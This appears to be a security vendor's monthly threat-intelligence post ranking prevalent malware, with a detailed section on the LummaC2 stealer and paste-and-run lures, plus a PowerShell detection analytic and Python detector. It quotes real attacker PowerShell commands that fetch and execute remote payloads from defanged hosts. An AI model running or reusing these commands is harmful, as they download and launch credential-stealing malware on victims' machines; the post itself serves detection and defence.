Highlights from October
ChromeLoader remained in 1st on our top 10 most prevalent threat list, for the fifth month running. SocGholish dropped out of 2nd place, where it had been holding steady for the last 3 months, and moved down to 6th in October. Its fake-update kindred spirit, Scarlet Goldfinch, also decreased in activity and dropped from 4th to 8th.
Red Canary saw ongoing widespread use of the paste and run (aka ClickFix) initial access technique last month. The technique—which tricks victims into copying, pasting, and running malicious PowerShell code—is proving to be an extremely effective method for gaining access to endpoints. Initial access techniques generally start to become less effective over time as defenders and organizations become savvy to adversary tricks, but paste and run shows no signs of slowing down. On the contrary, the number of adversaries using it—including reports of APT28—the different payloads delivered, and the vectors used to distribute the lure continue to increase at this time.
LummaC2 jumped into 2nd place thanks to multiple ongoing campaigns delivering LummaC2 as a payload, some of which use the paste and run technique. NetSupport Manager, coming in 3rd, also earned its place on the list this month as a paste and run payload. LummaC2 has been on the top 10 list for the last three months; you can read more about this stealer below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for October 2024:
| Month's rank | Threat name | Threat description |
|---|---|---|
| ➡ 1 | ChromeLoader | Malware that modifies victims' browser settings and redirects user traffic to advertisement websites |
| ⬆ 2 | LummaC2 | Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| ⬆ 3 | NetSupport Manager | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| ⬇ 4* | Amber Albatross | Red Canary's name for a cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
| ⬆ 4* |  | Collection of Python classes to construct/manipulate network protocols |
| ⬇ 6 | SocGholish | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| ⬆ 7 |  | Open source tool that dumps credentials using various techniques |
| ⬇ 8* | Scarlet Goldfinch | Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| ⬆ 9* |  | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| ⬆ 9* | Ippedo | USB worm that can include a function to download and execute arbitrary binaries |
| ⬆ 9* |  | Malware family associated with ad fraud activity through the distribution of adware applications |
⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
LummaC2 has MaaS appeal
LummaC2, also known as LummaC or Lumma Stealer, is a malware-as-a-service (MaaS) stealer that has been available for purchase on underground forums since at least mid-2022. Subscriptions start at $250 USD per month, all the way up to a one-time payment of $20,000 USD to gain access to Lumma source code. LummaC2 is not the only MaaS stealer in use by a large number of adversaries—others include RedLine, Vidar, Raccoon, and more. The MaaS model is popular because it enables adversaries to do evil with relative ease and low overhead, giving them access to effective malware like LummaC2 with continuous development, customer support, and a range of features.
Similar to other stealers, LummaC2 was initially designed to target cryptocurrency wallets, browser information, and 2FA tokens, but it has expanded beyond its original scope. It remains in active development, and over time has added features including customizable stealer configurations and a loader capability for delivering additional payloads via EXE, DLL, or PowerShell. Here at Red Canary we've seen it grow in popularity over the past year, reaching our number 2 spot this past month and on track to surpass that prevalence in November.
Initial access IOCs vary according to the delivery method and loader chosen by the adversary, so early detection telemetry varies from case to case. LummaC2 delivery vehicles have been presented to users in an array of creative ways, including phishing emails, drive-by downloads posing as browser updates, fake CAPTCHAs, and masquerading as fake AI software.
One example behavior chain we saw in October involved a user searching for music being redirected to a malicious fake CAPTCHA page hosted at streamingsplays[.]com. The fake CAPTCHA used PowerShell's Invoke-Expression (iex) function to reach out to iplogger[.]ru with the following deobfuscated command:

```powershell
iex (iwr https://iplogger[.]ru/259Ja6 -UseBasicParsing).Content
```

That command, in turn, attempted to download and execute a payload from contabostorage[.]com (also uploaded to VirusTotal by third parties):

```powershell
$webClient = New-Object System.Net.WebClient
$url1 = "https://eu2.contabostorage[.]com/97c9beb737884d93a1899766d9f4e34c:gostired/kfhjr76.zip"
$zipPath1 = "$env:TEMP\pg1.zip"
$webClient.DownloadFile($url1, $zipPath1)
$extractPath1 = "$env:TEMP\file"
Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
Start-Process -FilePath $env:TEMP\file\Setup.exe
```

The file pg1.zip in this example is consistent with LummaC2.
Popular LummaC2 loaders have included Arechclient2/SectopRAT, Emmenhtal, and SmartLoader, among others. More recently, Red Canary and other researchers have observed HijackLoader/IDAT Loader (SHA256: 8ce1cde3bd1fa2945af8e03459775a87dba7275c17401ab19e525b3238609f6b) delivering LummaC2.
Behavioral detection of LummaC2 can vary quite a bit since it requires distributors to use crypters. Multiple detection analytics could catch LummaC2 simply because an adversary configured the crypter in a particular way. Crypters that we've observed paired with LummaC2 include PureCrypter and CypherIT. Depending on the delivery method and adversary configurations, LummaC2 may be injected into a hollowed process—we've recently observed OpenWith.exe and more.exe, among others—or leverage DLL side-loading for execution. The stealer activity occurs within memory with direct exfiltration to C2; however, in some cases collected data may be staged in text files like System.txt prior to ZIP archiving for theft. This means that looking for C2 activity or suspicious .txt file creation may also help detect LummaC2. It does not maintain persistence on its own; however, accompanying loaders or follow-on payloads may create and maintain persistence.
LummaC2 has been used by adversaries to deliver additional payloads such as PrivateLoader and, more recently, Amadey. In one instance we observed, Amadey (SHA256: da63a2d8fffb5fccd40785e59c3e50804456395bba9a1b4b2becbd8988360754) paired with NetSupport Manager (SHA256: 1b63f83f06dbd9125a6983a36e0dbd64026bb4f535e97c5df67c1563d91eff89) as a follow-on payload.
Threat researchers continue to share LummaC2 IOCs and other information that can be used to detect LummaC2. While LummaC2 has a complex delivery and execution chain, its many moving parts and associated threats give us opportunities to detect it before it successfully downloads and executes. For example, as seen by the fake CAPTCHA we shared above, sometimes lures that lead to LummaC2 use PowerShell to download remote resources. That gives us an early detection opportunity.
Detection opportunity: PowerShell using invoke-expression to download content
This pseudo detection analytic identifies instances of PowerShell using invoke-expression to download content from an http URL. Adversaries attempting to deliver threats like LummaC2 use this function to download remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.
```
process == (powershell)
&&
deobfuscated_command_line_includes (iex)
||
deobfuscated_command_line_includes (.invoke, invoke-expression)
&&
deobfuscated_command_line_includes (http)
&&
command_line_does_not_include == (*)
```

Note: * is a placeholder for strings associated with legitimate use of this function in your environment.
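As an added example (not Red Canary's code, and not any product's query language), here is a Python implementation of the pseudo analytic above run over constructed process events, one of which is shaped like the deobfuscated fake-CAPTCHA command from the LummaC2 section. It reads the analytic as process == powershell && (iex || invoke-expression || .invoke) && http && not allowlisted, stands in for deobfuscated_command_line by expanding -EncodedCommand payloads (base64 of a UTF-16LE script), and uses the Chocolatey install script URL as a constructed placeholder for *. The event field names, the example.invalid host, and the helper names are assumptions made for this example.

```python
import base64
import re
from dataclasses import dataclass
from typing import List


# Assumed process-event shape; the field names are this example's own,
# not any EDR product's schema.
@dataclass
class ProcessEvent:
    process_name: str   # image name of the launched process
    command_line: str   # raw command line as recorded by the sensor


POWERSHELL_NAMES = {"powershell", "powershell.exe", "pwsh.exe"}

# Stand-in for the analytic's "*": strings tied to legitimate invoke-expression
# use in your environment. The Chocolatey entry is a constructed example.
LEGITIMATE_PATTERNS = [
    re.compile(r"community\.chocolatey\.org/install\.ps1", re.IGNORECASE),
]

# -EncodedCommand (and its short forms) carries base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
# The three spellings the analytic lists: iex, invoke-expression, .invoke
IEX_PATTERN = re.compile(r"\biex\b|invoke-expression|\.invoke\b", re.IGNORECASE)


def deobfuscate(command_line: str) -> str:
    """Best-effort stand-in for deobfuscated_command_line: expand an encoded
    command so the matching below sees the script that actually runs."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return command_line
    try:
        script = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line  # not a real encoded command; match on the raw line
    return command_line[: match.start()] + script


def is_legitimate(command_line: str) -> bool:
    """True when the command line matches a known-good pattern (the '*' slot)."""
    return any(p.search(command_line) for p in LEGITIMATE_PATTERNS)


def matches_analytic(event: ProcessEvent) -> bool:
    """process == powershell && (iex|invoke-expression|.invoke) && http && !allowlisted"""
    if event.process_name.lower() not in POWERSHELL_NAMES:
        return False
    deobfuscated = deobfuscate(event.command_line)
    if not IEX_PATTERN.search(deobfuscated):
        return False
    if "http" not in deobfuscated.lower():
        return False
    return not is_legitimate(deobfuscated)


def flag_events(events: List[ProcessEvent]) -> List[int]:
    """Indices of the events that the detection analytic fires on."""
    return [i for i, e in enumerate(events) if matches_analytic(e)]


def encoded_command_line(script: str) -> str:
    """Build a constructed -EncodedCommand launch line for test telemetry."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -w hidden -EncodedCommand {b64}"


# Constructed sample telemetry. Index 0 mirrors the shape of the fake-CAPTCHA
# command described above, with a placeholder host in place of the real one;
# index 1 is the same script delivered through -EncodedCommand.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe",
                 'powershell.exe -c "iex (iwr https://example.invalid/payload.ps1 -UseBasicParsing).Content"'),
    ProcessEvent("powershell.exe",
                 encoded_command_line("iex (iwr https://example.invalid/payload.ps1 -UseBasicParsing).Content")),
    ProcessEvent("powershell.exe",
                 "powershell.exe -c \"iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\""),
    ProcessEvent("powershell.exe", "powershell.exe -c Get-Process"),
    ProcessEvent("cmd.exe", 'cmd.exe /c "iex http://example.invalid"'),
]

if __name__ == "__main__":
    for i in flag_events(SAMPLE_EVENTS):
        print(f"event {i} matched: {deobfuscate(SAMPLE_EVENTS[i].command_line)}")
```

Only the first two constructed events fire: the Chocolatey install line is excluded by the allowlist slot, the plain Get-Process launch has no invoke-expression, and the cmd.exe event fails the process predicate. Tuning the * slot against your own telemetry is what keeps the analytic useful, since broad exclusions would also hide the lures described above.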
ICYMI: Stealers evolve to bypass Google Chrome’s new app-bound encryption
With the release of Google Chrome v127, Google implemented “application-bound encryption” (aka “app-bound encryption” or ABE), a new feature aimed at stopping credential access attacks on Google Chrome cookies. This control relies on an elevated service running on Windows systems that attempts to verify an application is Google Chrome instead of stealer malware. This change has shifted the stealer landscape, forcing malware authors to implement new features to bypass the control and steal cookies. Multiple stealer families have already implemented bypasses to obtain cookies from newer Chromium browsers. These include Stealc, Vidar, LummaC2, Meduza, and more.
On November 13, Keith McCammon and Tony Lambert published a blog post sharing details on how stealers are bypassing app-bound encryption and what to do to help mitigate the impact of these changes.